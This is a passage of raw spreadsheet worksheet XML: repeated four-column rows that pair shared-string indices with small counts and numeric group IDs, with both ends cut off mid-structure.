        <v>16229</v>
      </c>
      <c r="B13670" t="s">
        <v>16219</v>
      </c>
      <c r="C13670">
        <v>0</v>
      </c>
      <c r="D13670">
        <v>5131</v>
      </c>
    </row>
    <row r="13671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13671" t="s">
        <v>16230</v>
      </c>
      <c r="B13671" t="s">
        <v>16220</v>
      </c>
      <c r="C13671">
        <v>0</v>
      </c>
      <c r="D13671">
        <v>5131</v>
      </c>
    </row>
    <row r="13672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13672" t="s">
        <v>16229</v>
      </c>
      <c r="B13672" t="s">
        <v>16221</v>
      </c>
      <c r="C13672">
        <v>0</v>
      </c>
      <c r="D13672">
        <v>5131</v>
      </c>
    </row>
    <row r="13673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13673" t="s">
        <v>16230</v>
      </c>
      <c r="B13673" t="s">
        <v>16222</v>
      </c>
      <c r="C13673">
        <v>0</v>
      </c>
      <c r="D13673">
        <v>5131</v>
      </c>
    </row>
    <row r="13674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13674" t="s">
        <v>16223</v>
      </c>
      <c r="B13674" t="s">
        <v>16223</v>
      </c>
      <c r="C13674">
        <v>26</v>
      </c>
      <c r="D13674">
        <v>5131</v>
      </c>
    </row>
    <row r="13675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13675" t="s">
        <v>16224</v>
      </c>
      <c r="B13675" t="s">
        <v>16224</v>
      </c>
      <c r="C13675">
        <v>0</v>
      </c>
      <c r="D13675">
        <v>5131</v>
      </c>
    </row>
    <row r="13676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13676" t="s">
        <v>16228</v>
      </c>
      <c r="B13676" t="s">
        <v>16211</v>
      </c>
      <c r="C13676">
        <v>0</v>
      </c>
      <c r="D13676">
        <v>5123</v>
      </c>
    </row>
    <row r="13677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13677" t="s">
        <v>16231</v>
      </c>
      <c r="B13677" t="s">
        <v>16212</v>
      </c>
      <c r="C13677">
        <v>0</v>
      </c>
      <c r="D13677">
        <v>5123</v>
      </c>
    </row>
    <row r="13678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13678" t="s">
        <v>16228</v>
      </c>
      <c r="B13678" t="s">
        <v>16213</v>
      </c>
      <c r="C13678">
        <v>0</v>
      </c>
      <c r="D13678">
        <v>5123</v>
      </c>
    </row>
    <row r="13679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13679" t="s">
        <v>16231</v>
      </c>
      <c r="B13679" t="s">
        <v>16214</v>
      </c>
      <c r="C13679">
        <v>0</v>
      </c>
      <c r="D13679">
        <v>5123</v>
      </c>
    </row>
    <row r="13680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13680" t="s">
        <v>16228</v>
      </c>
      <c r="B13680" t="s">
        <v>16215</v>
      </c>
      <c r="C13680">
        <v>4</v>
      </c>
      <c r="D13680">
        <v>5123</v>
      </c>
    </row>
    <row r="13681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13681" t="s">
        <v>16231</v>
      </c>
      <c r="B13681" t="s">
        <v>16216</v>
      </c>
      <c r="C13681">
        <v>2</v>
      </c>
      <c r="D13681">
        <v>5123</v>
      </c>
    </row>
    <row r="13682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13682" t="s">
        <v>16228</v>
      </c>
      <c r="B13682" t="s">
        <v>16217</v>
      </c>
      <c r="C13682">
        <v>1</v>
      </c>
      <c r="D13682">
        <v>5123</v>
      </c>
    </row>
    <row r="13683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13683" t="s">
        <v>16231</v>
      </c>
      <c r="B13683" t="s">
        <v>16218</v>
      </c>
      <c r="C13683">
        <v>1</v>
      </c>
      <c r="D13683">
        <v>5123</v>
      </c>
    </row>
    <row r="13684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13684" t="s">
        <v>16229</v>
      </c>
      <c r="B13684" t="s">
        <v>16219</v>
      </c>
      <c r="C13684">
        <v>0</v>
      </c>
      <c r="D13684">
        <v>5123</v>
      </c>
    </row>
    <row r="13685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13685" t="s">
        <v>16230</v>
      </c>
      <c r="B13685" t="s">
        <v>16220</v>
      </c>
      <c r="C13685">
        <v>0</v>
      </c>
      <c r="D13685">
        <v>5123</v>
      </c>
    </row>
    <row r="13686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13686" t="s">
        <v>16229</v>
      </c>
      <c r="B13686" t="s">
        <v>16221</v>
      </c>
      <c r="C13686">
        <v>14</v>
      </c>
      <c r="D13686">
        <v>5123</v>
      </c>
    </row>
    <row r="13687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13687" t="s">
        <v>16230</v>
      </c>
      <c r="B13687" t="s">
        <v>16222</v>
      </c>
      <c r="C13687">
        <v>12</v>
      </c>
      <c r="D13687">
        <v>5123</v>
      </c>
    </row>
    <row r="13688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13688" t="s">
        <v>16223</v>
      </c>
      <c r="B13688" t="s">
        <v>16223</v>
      </c>
      <c r="C13688">
        <v>22</v>
      </c>
      <c r="D13688">
        <v>5123</v>
      </c>
    </row>
    <row r="13689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13689" t="s">
        <v>16224</v>
      </c>
      <c r="B13689" t="s">
        <v>16224</v>
      </c>
      <c r="C13689">
        <v>0</v>
      </c>
      <c r="D13689">
        <v>5123</v>
      </c>
    </row>
    <row r="13690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13690" t="s">
        <v>16228</v>
      </c>
      <c r="B13690" t="s">
        <v>16211</v>
      </c>
      <c r="C13690">
        <v>1</v>
      </c>
      <c r="D13690">
        <v>1159</v>
      </c>
    </row>
    <row r="13691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13691" t="s">
        <v>16231</v>
      </c>
      <c r="B13691" t="s">
        <v>16212</v>
      </c>
      <c r="C13691">
        <v>0</v>
      </c>
      <c r="D13691">
        <v>1159</v>
      </c>
    </row>
    <row r="13692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13692" t="s">
        <v>16228</v>
      </c>
      <c r="B13692" t="s">
        <v>16213</v>
      </c>
      <c r="C13692">
        <v>0</v>
      </c>
      <c r="D13692">
        <v>1159</v>
      </c>
    </row>
    <row r="13693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13693" t="s">
        <v>16231</v>
      </c>
      <c r="B13693" t="s">
        <v>16214</v>
      </c>
      <c r="C13693">
        <v>0</v>
      </c>
      <c r="D13693">
        <v>1159</v>
      </c>
    </row>
    <row r="13694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13694" t="s">
        <v>16228</v>
      </c>
      <c r="B13694" t="s">
        <v>16215</v>
      </c>
      <c r="C13694">
        <v>5</v>
      </c>
      <c r="D13694">
        <v>1159</v>
      </c>
    </row>
    <row r="13695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13695" t="s">
        <v>16231</v>
      </c>
      <c r="B13695" t="s">
        <v>16216</v>
      </c>
      <c r="C13695">
        <v>8</v>
      </c>
      <c r="D13695">
        <v>1159</v>
      </c>
    </row>
    <row r="13696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13696" t="s">
        <v>16228</v>
      </c>
      <c r="B13696" t="s">
        <v>16217</v>
      </c>
      <c r="C13696">
        <v>5</v>
      </c>
      <c r="D13696">
        <v>1159</v>
      </c>
    </row>
    <row r="13697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13697" t="s">
        <v>16231</v>
      </c>
      <c r="B13697" t="s">
        <v>16218</v>
      </c>
      <c r="C13697">
        <v>9</v>
      </c>
      <c r="D13697">
        <v>1159</v>
      </c>
    </row>
    <row r="13698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13698" t="s">
        <v>16229</v>
      </c>
      <c r="B13698" t="s">
        <v>16219</v>
      </c>
      <c r="C13698">
        <v>0</v>
      </c>
      <c r="D13698">
        <v>1159</v>
      </c>
    </row>
    <row r="13699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13699" t="s">
        <v>16230</v>
      </c>
      <c r="B13699" t="s">
        <v>16220</v>
      </c>
      <c r="C13699">
        <v>5</v>
      </c>
      <c r="D13699">
        <v>1159</v>
      </c>
    </row>
    <row r="13700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13700" t="s">
        <v>16229</v>
      </c>
      <c r="B13700" t="s">
        <v>16221</v>
      </c>
      <c r="C13700">
        <v>17</v>
      </c>
      <c r="D13700">
        <v>1159</v>
      </c>
    </row>
    <row r="13701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13701" t="s">
        <v>16230</v>
      </c>
      <c r="B13701" t="s">
        <v>16222</v>
      </c>
      <c r="C13701">
        <v>139</v>
      </c>
      <c r="D13701">
        <v>1159</v>
      </c>
    </row>
    <row r="13702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13702" t="s">
        <v>16223</v>
      </c>
      <c r="B13702" t="s">
        <v>16223</v>
      </c>
      <c r="C13702">
        <v>25</v>
      </c>
      <c r="D13702">
        <v>1159</v>
      </c>
    </row>
    <row r="13703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13703" t="s">
        <v>16224</v>
      </c>
      <c r="B13703" t="s">
        <v>16224</v>
      </c>
      <c r="C13703">
        <v>3</v>
      </c>
      <c r="D13703">
        <v>1159</v>
      </c>
    </row>
    <row r="13704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13704" t="s">
        <v>16228</v>
      </c>
      <c r="B13704" t="s">
        <v>16211</v>
      </c>
      <c r="C13704">
        <v>0</v>
      </c>
      <c r="D13704">
        <v>5145</v>
      </c>
    </row>
    <row r="13705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13705" t="s">
        <v>16231</v>
      </c>
      <c r="B13705" t="s">
        <v>16212</v>
      </c>
      <c r="C13705">
        <v>0</v>
      </c>
      <c r="D13705">
        <v>5145</v>
      </c>
    </row>
    <row r="13706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13706" t="s">
        <v>16228</v>
      </c>
      <c r="B13706" t="s">
        <v>16213</v>
      </c>
      <c r="C13706">
        <v>0</v>
      </c>
      <c r="D13706">
        <v>5145</v>
      </c>
    </row>
    <row r="13707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13707" t="s">
        <v>16231</v>
      </c>
      <c r="B13707" t="s">
        <v>16214</v>
      </c>
      <c r="C13707">
        <v>0</v>
      </c>
      <c r="D13707">
        <v>5145</v>
      </c>
    </row>
    <row r="13708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13708" t="s">
        <v>16228</v>
      </c>
      <c r="B13708" t="s">
        <v>16215</v>
      </c>
      <c r="C13708">
        <v>1</v>
      </c>
      <c r="D13708">
        <v>5145</v>
      </c>
    </row>
    <row r="13709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13709" t="s">
        <v>16231</v>
      </c>
      <c r="B13709" t="s">
        <v>16216</v>
      </c>
      <c r="C13709">
        <v>0</v>
      </c>
      <c r="D13709">
        <v>5145</v>
      </c>
    </row>
    <row r="13710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13710" t="s">
        <v>16228</v>
      </c>
      <c r="B13710" t="s">
        <v>16217</v>
      </c>
      <c r="C13710">
        <v>3</v>
      </c>
      <c r="D13710">
        <v>5145</v>
      </c>
    </row>
    <row r="13711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13711" t="s">
        <v>16231</v>
      </c>
      <c r="B13711" t="s">
        <v>16218</v>
      </c>
      <c r="C13711">
        <v>0</v>
      </c>
      <c r="D13711">
        <v>5145</v>
      </c>
    </row>
    <row r="13712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13712" t="s">
        <v>16229</v>
      </c>
      <c r="B13712" t="s">
        <v>16219</v>
      </c>
      <c r="C13712">
        <v>0</v>
      </c>
      <c r="D13712">
        <v>5145</v>
      </c>
    </row>
    <row r="13713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13713" t="s">
        <v>16230</v>
      </c>
      <c r="B13713" t="s">
        <v>16220</v>
      </c>
      <c r="C13713">
        <v>0</v>
      </c>
      <c r="D13713">
        <v>5145</v>
      </c>
    </row>
    <row r="13714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13714" t="s">
        <v>16229</v>
      </c>
      <c r="B13714" t="s">
        <v>16221</v>
      </c>
      <c r="C13714">
        <v>15</v>
      </c>
      <c r="D13714">
        <v>5145</v>
      </c>
    </row>
    <row r="13715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13715" t="s">
        <v>16230</v>
      </c>
      <c r="B13715" t="s">
        <v>16222</v>
      </c>
      <c r="C13715">
        <v>15</v>
      </c>
      <c r="D13715">
        <v>5145</v>
      </c>
    </row>
    <row r="13716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13716" t="s">
        <v>16223</v>
      </c>
      <c r="B13716" t="s">
        <v>16223</v>
      </c>
      <c r="C13716">
        <v>1</v>
      </c>
      <c r="D13716">
        <v>5145</v>
      </c>
    </row>
    <row r="13717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13717" t="s">
        <v>16224</v>
      </c>
      <c r="B13717" t="s">
        <v>16224</v>
      </c>
      <c r="C13717">
        <v>1</v>
      </c>
      <c r="D13717">
        <v>5145</v>
      </c>
    </row>
    <row r="13718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13718" t="s">
        <v>16228</v>
      </c>
      <c r="B13718" t="s">
        <v>16211</v>
      </c>
      <c r="C13718">
        <v>0</v>
      </c>
      <c r="D13718">
        <v>5136</v>
      </c>
    </row>
    <row r="13719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13719" t="s">
        <v>16231</v>
      </c>
      <c r="B13719" t="s">
        <v>16212</v>
      </c>
      <c r="C13719">
        <v>0</v>
      </c>
      <c r="D13719">
        <v>5136</v>
      </c>
    </row>
    <row r="13720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13720" t="s">
        <v>16228</v>
      </c>
      <c r="B13720" t="s">
        <v>16213</v>
      </c>
      <c r="C13720">
        <v>2</v>
      </c>
      <c r="D13720">
        <v>5136</v>
      </c>
    </row>
    <row r="13721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13721" t="s">
        <v>16231</v>
      </c>
      <c r="B13721" t="s">
        <v>16214</v>
      </c>
      <c r="C13721">
        <v>3</v>
      </c>
      <c r="D13721">
        <v>5136</v>
      </c>
    </row>
    <row r="13722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13722" t="s">
        <v>16228</v>
      </c>
      <c r="B13722" t="s">
        <v>16215</v>
      </c>
      <c r="C13722">
        <v>1</v>
      </c>
      <c r="D13722">
        <v>5136</v>
      </c>
    </row>
    <row r="13723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13723" t="s">
        <v>16231</v>
      </c>
      <c r="B13723" t="s">
        <v>16216</v>
      </c>
      <c r="C13723">
        <v>2</v>
      </c>
      <c r="D13723">
        <v>5136</v>
      </c>
    </row>
    <row r="13724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13724" t="s">
        <v>16228</v>
      </c>
      <c r="B13724" t="s">
        <v>16217</v>
      </c>
      <c r="C13724">
        <v>0</v>
      </c>
      <c r="D13724">
        <v>5136</v>
      </c>
    </row>
    <row r="13725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13725" t="s">
        <v>16231</v>
      </c>
      <c r="B13725" t="s">
        <v>16218</v>
      </c>
      <c r="C13725">
        <v>2</v>
      </c>
      <c r="D13725">
        <v>5136</v>
      </c>
    </row>
    <row r="13726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13726" t="s">
        <v>16229</v>
      </c>
      <c r="B13726" t="s">
        <v>16219</v>
      </c>
      <c r="C13726">
        <v>0</v>
      </c>
      <c r="D13726">
        <v>5136</v>
      </c>
    </row>
    <row r="13727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13727" t="s">
        <v>16230</v>
      </c>
      <c r="B13727" t="s">
        <v>16220</v>
      </c>
      <c r="C13727">
        <v>1</v>
      </c>
      <c r="D13727">
        <v>5136</v>
      </c>
    </row>
    <row r="13728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13728" t="s">
        <v>16229</v>
      </c>
      <c r="B13728" t="s">
        <v>16221</v>
      </c>
      <c r="C13728">
        <v>1</v>
      </c>
      <c r="D13728">
        <v>5136</v>
      </c>
    </row>
    <row r="13729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13729" t="s">
        <v>16230</v>
      </c>
      <c r="B13729" t="s">
        <v>16222</v>
      </c>
      <c r="C13729">
        <v>1</v>
      </c>
      <c r="D13729">
        <v>5136</v>
      </c>
    </row>
    <row r="13730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13730" t="s">
        <v>16223</v>
      </c>
      <c r="B13730" t="s">
        <v>16223</v>
      </c>
      <c r="C13730">
        <v>6</v>
      </c>
      <c r="D13730">
        <v>5136</v>
      </c>
    </row>
    <row r="13731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13731" t="s">
        <v>16224</v>
      </c>
      <c r="B13731" t="s">
        <v>16224</v>
      </c>
      <c r="C13731">
        <v>1</v>
      </c>
      <c r="D13731">
        <v>5136</v>
      </c>
    </row>
    <row r="13732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13732" t="s">
        <v>16228</v>
      </c>
      <c r="B13732" t="s">
        <v>16211</v>
      </c>
      <c r="C13732">
        <v>1</v>
      </c>
      <c r="D13732">
        <v>285</v>
      </c>
    </row>
    <row r="13733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13733" t="s">
        <v>16231</v>
      </c>
      <c r="B13733" t="s">
        <v>16212</v>
      </c>
      <c r="C13733">
        <v>0</v>
      </c>
      <c r="D13733">
        <v>285</v>
      </c>
    </row>
    <row r="13734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13734" t="s">
        <v>16228</v>
      </c>
      <c r="B13734" t="s">
        <v>16213</v>
      </c>
      <c r="C13734">
        <v>0</v>
      </c>
      <c r="D13734">
        <v>285</v>
      </c>
    </row>
    <row r="13735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13735" t="s">
        <v>16231</v>
      </c>
      <c r="B13735" t="s">
        <v>16214</v>
      </c>
      <c r="C13735">
        <v>0</v>
      </c>
      <c r="D13735">
        <v>285</v>
      </c>
    </row>
    <row r="13736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13736" t="s">
        <v>16228</v>
      </c>
      <c r="B13736" t="s">
        <v>16215</v>
      </c>
      <c r="C13736">
        <v>2</v>
      </c>
      <c r="D13736">
        <v>285</v>
      </c>
    </row>
    <row r="13737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13737" t="s">
        <v>16231</v>
      </c>
      <c r="B13737" t="s">
        <v>16216</v>
      </c>
      <c r="C13737">
        <v>5</v>
      </c>
      <c r="D13737">
        <v>285</v>
      </c>
    </row>
    <row r="13738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13738" t="s">
        <v>16228</v>
      </c>
      <c r="B13738" t="s">
        <v>16217</v>
      </c>
      <c r="C13738">
        <v>26</v>
      </c>
      <c r="D13738">
        <v>285</v>
      </c>
    </row>
    <row r="13739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13739" t="s">
        <v>16231</v>
      </c>
      <c r="B13739" t="s">
        <v>16218</v>
      </c>
      <c r="C13739">
        <v>31</v>
      </c>
      <c r="D13739">
        <v>285</v>
      </c>
    </row>
    <row r="13740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13740" t="s">
        <v>16229</v>
      </c>
      <c r="B13740" t="s">
        <v>16219</v>
      </c>
      <c r="C13740">
        <v>0</v>
      </c>
      <c r="D13740">
        <v>285</v>
      </c>
    </row>
    <row r="13741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13741" t="s">
        <v>16230</v>
      </c>
      <c r="B13741" t="s">
        <v>16220</v>
      </c>
      <c r="C13741">
        <v>1</v>
      </c>
      <c r="D13741">
        <v>285</v>
      </c>
    </row>
    <row r="13742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13742" t="s">
        <v>16229</v>
      </c>
      <c r="B13742" t="s">
        <v>16221</v>
      </c>
      <c r="C13742">
        <v>35</v>
      </c>
      <c r="D13742">
        <v>285</v>
      </c>
    </row>
    <row r="13743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13743" t="s">
        <v>16230</v>
      </c>
      <c r="B13743" t="s">
        <v>16222</v>
      </c>
      <c r="C13743">
        <v>109</v>
      </c>
      <c r="D13743">
        <v>285</v>
      </c>
    </row>
    <row r="13744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13744" t="s">
        <v>16223</v>
      </c>
      <c r="B13744" t="s">
        <v>16223</v>
      </c>
      <c r="C13744">
        <v>22</v>
      </c>
      <c r="D13744">
        <v>285</v>
      </c>
    </row>
    <row r="13745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13745" t="s">
        <v>16224</v>
      </c>
      <c r="B13745" t="s">
        <v>16224</v>
      </c>
      <c r="C13745">
        <v>1</v>
      </c>
      <c r="D13745">
        <v>285</v>
      </c>
    </row>
    <row r="13746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13746" t="s">
        <v>16228</v>
      </c>
      <c r="B13746" t="s">
        <v>16211</v>
      </c>
      <c r="C13746">
        <v>0</v>
      </c>
      <c r="D13746">
        <v>1200</v>
      </c>
    </row>
    <row r="13747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13747" t="s">
        <v>16231</v>
      </c>
      <c r="B13747" t="s">
        <v>16212</v>
      </c>
      <c r="C13747">
        <v>0</v>
      </c>
      <c r="D13747">
        <v>1200</v>
      </c>
    </row>
    <row r="13748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13748" t="s">
        <v>16228</v>
      </c>
      <c r="B13748" t="s">
        <v>16213</v>
      </c>
      <c r="C13748">
        <v>0</v>
      </c>
      <c r="D13748">
        <v>1200</v>
      </c>
    </row>
    <row r="13749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13749" t="s">
        <v>16231</v>
      </c>
      <c r="B13749" t="s">
        <v>16214</v>
      </c>
      <c r="C13749">
        <v>0</v>
      </c>
      <c r="D13749">
        <v>1200</v>
      </c>
    </row>
    <row r="13750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13750" t="s">
        <v>16228</v>
      </c>
      <c r="B13750" t="s">
        <v>16215</v>
      </c>
      <c r="C13750">
        <v>4</v>
      </c>
      <c r="D13750">
        <v>1200</v>
      </c>
    </row>
    <row r="13751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13751" t="s">
        <v>16231</v>
      </c>
      <c r="B13751" t="s">
        <v>16216</v>
      </c>
      <c r="C13751">
        <v>4</v>
      </c>
      <c r="D13751">
        <v>1200</v>
      </c>
    </row>
    <row r="13752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13752" t="s">
        <v>16228</v>
      </c>
      <c r="B13752" t="s">
        <v>16217</v>
      </c>
      <c r="C13752">
        <v>10</v>
      </c>
      <c r="D13752">
        <v>1200</v>
      </c>
    </row>
    <row r="13753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13753" t="s">
        <v>16231</v>
      </c>
      <c r="B13753" t="s">
        <v>16218</v>
      </c>
      <c r="C13753">
        <v>0</v>
      </c>
      <c r="D13753">
        <v>1200</v>
      </c>
    </row>
    <row r="13754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13754" t="s">
        <v>16229</v>
      </c>
      <c r="B13754" t="s">
        <v>16219</v>
      </c>
      <c r="C13754">
        <v>0</v>
      </c>
      <c r="D13754">
        <v>1200</v>
      </c>
    </row>
    <row r="13755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13755" t="s">
        <v>16230</v>
      </c>
      <c r="B13755" t="s">
        <v>16220</v>
      </c>
      <c r="C13755">
        <v>0</v>
      </c>
      <c r="D13755">
        <v>1200</v>
      </c>
    </row>
    <row r="13756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13756" t="s">
        <v>16229</v>
      </c>
      <c r="B13756" t="s">
        <v>16221</v>
      </c>
      <c r="C13756">
        <v>0</v>
      </c>
      <c r="D13756">
        <v>1200</v>
      </c>
    </row>
    <row r="13757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13757" t="s">
        <v>16230</v>
      </c>
      <c r="B13757" t="s">
        <v>16222</v>
      </c>
      <c r="C13757">
        <v>0</v>
      </c>
      <c r="D13757">
        <v>1200</v>
      </c>
    </row>
    <row r="13758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13758" t="s">
        <v>16223</v>
      </c>
      <c r="B13758" t="s">
        <v>16223</v>
      </c>
      <c r="C13758">
        <v>24</v>
      </c>
      <c r="D13758">
        <v>1200</v>
      </c>
    </row>
    <row r="13759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13759" t="s">
        <v>16224</v>
      </c>
      <c r="B13759" t="s">
        <v>16224</v>
      </c>
      <c r="C13759">
        <v>2</v>
      </c>
      <c r="D13759">
        <v>1200</v>
      </c>
    </row>
    <row r="13760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13760" t="s">
        <v>16228</v>
      </c>
      <c r="B13760" t="s">
        <v>16211</v>
      </c>
      <c r="C13760">
        <v>0</v>
      </c>
      <c r="D13760">
        <v>5115</v>
      </c>
    </row>
    <row r="13761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13761" t="s">
        <v>16231</v>
      </c>
      <c r="B13761" t="s">
        <v>16212</v>
      </c>
      <c r="C13761">
        <v>0</v>
      </c>
      <c r="D13761">
        <v>5115</v>
      </c>
    </row>
    <row r="13762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13762" t="s">
        <v>16228</v>
      </c>
      <c r="B13762" t="s">
        <v>16213</v>
      </c>
      <c r="C13762">
        <v>0</v>
      </c>
      <c r="D13762">
        <v>5115</v>
      </c>
    </row>
    <row r="13763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13763" t="s">
        <v>16231</v>
      </c>
      <c r="B13763" t="s">
        <v>16214</v>
      </c>
      <c r="C13763">
        <v>0</v>
      </c>
      <c r="D13763">
        <v>5115</v>
      </c>
    </row>
    <row r="13764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13764" t="s">
        <v>16228</v>
      </c>
      <c r="B13764" t="s">
        <v>16215</v>
      </c>
      <c r="C13764">
        <v>1</v>
      </c>
      <c r="D13764">
        <v>5115</v>
      </c>
    </row>
    <row r="13765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13765" t="s">
        <v>16231</v>
      </c>
      <c r="B13765" t="s">
        <v>16216</v>
      </c>
      <c r="C13765">
        <v>1</v>
      </c>
      <c r="D13765">
        <v>5115</v>
      </c>
    </row>
    <row r="13766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13766" t="s">
        <v>16228</v>
      </c>
      <c r="B13766" t="s">
        <v>16217</v>
      </c>
      <c r="C13766">
        <v>1</v>
      </c>
      <c r="D13766">
        <v>5115</v>
      </c>
    </row>
    <row r="13767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13767" t="s">
        <v>16231</v>
      </c>
      <c r="B13767" t="s">
        <v>16218</v>
      </c>
      <c r="C13767">
        <v>1</v>
      </c>
      <c r="D13767">
        <v>5115</v>
      </c>
    </row>
    <row r="13768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13768" t="s">
        <v>16229</v>
      </c>
      <c r="B13768" t="s">
        <v>16219</v>
      </c>
      <c r="C13768">
        <v>0</v>
      </c>
      <c r="D13768">
        <v>5115</v>
      </c>
    </row>
    <row r="13769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13769" t="s">
        <v>16230</v>
      </c>
      <c r="B13769" t="s">
        <v>16220</v>
      </c>
      <c r="C13769">
        <v>0</v>
      </c>
      <c r="D13769">
        <v>5115</v>
      </c>
    </row>
    <row r="13770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13770" t="s">
        <v>16229</v>
      </c>
      <c r="B13770" t="s">
        <v>16221</v>
      </c>
      <c r="C13770">
        <v>1</v>
      </c>
      <c r="D13770">
        <v>5115</v>
      </c>
    </row>
    <row r="13771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13771" t="s">
        <v>16230</v>
      </c>
      <c r="B13771" t="s">
        <v>16222</v>
      </c>
      <c r="C13771">
        <v>1</v>
      </c>
      <c r="D13771">
        <v>5115</v>
      </c>
    </row>
    <row r="13772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13772" t="s">
        <v>16223</v>
      </c>
      <c r="B13772" t="s">
        <v>16223</v>
      </c>
      <c r="C13772">
        <v>26</v>
      </c>
      <c r="D13772">
        <v>5115</v>
      </c>
    </row>
    <row r="13773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13773" t="s">
        <v>16224</v>
      </c>
      <c r="B13773" t="s">
        <v>16224</v>
      </c>
      <c r="C13773">
        <v>0</v>
      </c>
      <c r="D13773">
        <v>5115</v>
      </c>
    </row>
    <row r="13774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13774" t="s">
        <v>16231</v>
      </c>
      <c r="B13774" t="s">
        <v>16216</v>
      </c>
      <c r="C13774">
        <v>3</v>
      </c>
      <c r="D13774">
        <v>1365</v>
      </c>
    </row>
    <row r="13775" spans="1:4" x14ac:dyDescent="0.2">
